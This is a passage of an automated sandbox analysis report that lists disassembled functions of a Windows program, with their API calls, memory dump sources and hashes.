                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreate$BitmapClientMessageObjectRectSelectSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2414545248-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                                • Instruction ID: 8bb2e0385ae3c531c2e170360c03eff7dceb5b5f9b27b4236f5b68df8b256744
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22412AB1508340AFC314DF68C985E5BBBE8FBC8714F048A1EF59993291DBB4E904CB66
                                                                                                                                                                                                                                                                                                Function 0045FB10 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 371fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,1088D068), ref: 0045FBFD
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045FD6C
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00460023
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00460032
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCreateErrorFileHandleLastUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: \\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 2002255750-259948872
                                                                                                                                                                                                                                                                                                • Opcode ID: c925c25cf8bd047c9e5a3396a1d52339d9f8b9f25dbfcc1fd449f57c1f375c63
                                                                                                                                                                                                                                                                                                • Instruction ID: f68b579a164141f6a35d8a11ab023a6fd55b536e149a63f8f0d67cb16e8cd9f8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c925c25cf8bd047c9e5a3396a1d52339d9f8b9f25dbfcc1fd449f57c1f375c63
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53F139B15183419FC324DF25C881AAFB7E4BF89714F104A2EF99983351E778A948CB97
                                                                                                                                                                                                                                                                                                Function 00405230 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 366COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 004055AD
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,...,00000003,?), ref: 0040561D
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 00405675
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExtentPoint32Text
                                                                                                                                                                                                                                                                                                • String ID: ...$`=
                                                                                                                                                                                                                                                                                                • API String ID: 223599850-889875407
                                                                                                                                                                                                                                                                                                • Opcode ID: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                                • Instruction ID: 472bae36e9bbe25dca023677f1d007ac7a5f0ef4219e7f68ecfc9801725c9705
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31E131755087059FC310DF68C884A5BBBE5FB88304F548A2EF896A33A1D774E885CF96
                                                                                                                                                                                                                                                                                                Function 004042E0 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                • GetDIBColorTable.GDI32(00000000,?,00000001,?,?,?,004042D6,?,?,?,?,?,?,?,00000000), ref: 0040431B
                                                                                                                                                                                                                                                                                                • TransparentBlt.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,004042D6,?,?,?), ref: 00404360
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004043F4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401270: InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401270: CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                                • AlphaBlend.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,004042D6,?), ref: 004043AC
                                                                                                                                                                                                                                                                                                • StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,00000000,00CC0020), ref: 004043DE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ObjectSelect$AlphaBlendColorCompatibleCreateExchangeInterlockedStretchTableTransparent
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1847558199-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                                • Instruction ID: 431ece418818d9ed3e284c2d9fdf2eea9b1bc5e51d71579e1970bbd9de33fc15
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6641C9B1208740AFD214CB6AC884E2BB7E9EBCD718F108B1DF59DA3691D674ED01CB65
                                                                                                                                                                                                                                                                                                Function 00424AE0 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00424B28
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                                • Instruction ID: 473d6bda932dfe5e5726b0cd1595cc7b0c8836d5ab7cb817983b5e362455a3d3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A21D87176021077EB60AA94DCC6FD12354AB54B05F44407ABB04BE1C6CFEA6440CB69
                                                                                                                                                                                                                                                                                                Function 00411050 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0041109B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110AE
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 004110CF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110E2
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0041110B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0041111E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSendVisibleWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3984873885-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                                • Instruction ID: f50cee19580f5a7b4a735ae81b0960ad1265907f2bd47cc1e7f642e33356c098
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC21A070A40316ABD730DF759C41BAB7698BB88740F050A3EB649DB391EA75EC80879D
                                                                                                                                                                                                                                                                                                Function 004298F0 Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32 ref: 00429964
                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1800058468-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 422089f6943f840a1857ebeeed2a55ac56a072af819dc62ccc93b1be93c737d0
                                                                                                                                                                                                                                                                                                • Instruction ID: 4b68c3bfc8aa6a65b644341b41cfaa7d1e4508deb0fbdda8f8db971c9f13aea2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 422089f6943f840a1857ebeeed2a55ac56a072af819dc62ccc93b1be93c737d0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5316BB1604311AFE310CF68DC80F6BB7E5BB88710F504A1DF648DB290E774E9848BA6
                                                                                                                                                                                                                                                                                                Function 0040E9B0 Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0040E9D6
                                                                                                                                                                                                                                                                                                • LPtoDP.GDI32(?,?,00000002), ref: 0040E9EE
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EA08
                                                                                                                                                                                                                                                                                                • GetMapMode.GDI32(?,?,0047D9F0,00000000), ref: 0040EA2E
                                                                                                                                                                                                                                                                                                • DPtoLP.GDI32(?,?,00000002), ref: 0040EA45
                                                                                                                                                                                                                                                                                                • GetBkColor.GDI32(?), ref: 0040EA78
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
